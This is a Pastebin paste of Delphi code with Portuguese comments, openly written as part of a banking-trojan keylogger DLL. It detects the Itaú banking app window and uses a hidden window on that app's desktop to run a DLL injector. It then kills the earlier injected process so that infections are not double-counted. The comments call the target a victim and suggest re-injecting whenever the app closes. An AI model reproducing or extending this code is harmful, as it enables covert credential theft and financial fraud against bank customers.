Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- {
- Todo esse código deve ir dentro do seu módulo dlll da kl
- }
- function KillTask(ExeFileName: string): Integer;
- const
- PROCESS_TERMINATE = $0001;
- var
- ContinueLoop: BOOL;
- FSnapshotHandle: THandle;
- FProcessEntry32: TProcessEntry32;
- begin
- Result := 0;
- FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
- FProcessEntry32.dwSize := SizeOf(FProcessEntry32);
- ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
- while Integer(ContinueLoop) <> 0 do
- begin
- if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
- UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) =
- UpperCase(ExeFileName))) then
- Result := Integer(TerminateProcess(
- OpenProcess(PROCESS_TERMINATE,
- BOOL(0),
- FProcessEntry32.th32ProcessID),
- 0));
- ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
- end;
- CloseHandle(FSnapshotHandle);
- end;
- // Coloca intervalo de 1000 (1 segundo)
- procedure TForm1.tmrAppItaTimer(Sender: TObject);
- var
- si: TStartupInfo;
- pri: TProcessInformation;
- pid: DWORD;
- begin
- if FindWindow(nil, 'Aplicativo Itaú') > 0 then // Detectar quando a janelinha de carregamento do App Itaú aparece
- begin
- FillChar(si, SizeOf(si), 0);
- si.cb := SizeOf(si);
- si.dwFlags := STARTF_USESHOWWINDOW;
- si.wShowWindow := SW_HIDE;
- si.lpDesktop := 'default_set'; // Ambiente do App Itaú chama-se: 'default_set'
- // Executa o injetor de dll novamente, só que dessa vez dentro do ambiente do App Itaú :D
- CreateProcess(nil, 'Injetor.exe', nil, nil, False, NORMAL_PRIORITY_CLASS, nil, nil, si, pri);
- Sleep(1000);
- // Encerra o processo vítima da injeção de dll para não contar 2x o mesmo infect no op
- KillTask('processo_que_vc_injeta_a_all.exe');
- end;
- end;
- {
- Como esquema extra, você pode fazer algo para detectar quando o processo do App Itaú for encerrado pela vítima,
- como se ela estivesse saindo da info, daí você executaria novamente o injetor normalmnte por exemplo com a função ShellExecute();
- e em seguida encerraria o processo onde a dll está injetada, assim você ficaria preso somente ao App Itaú.
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement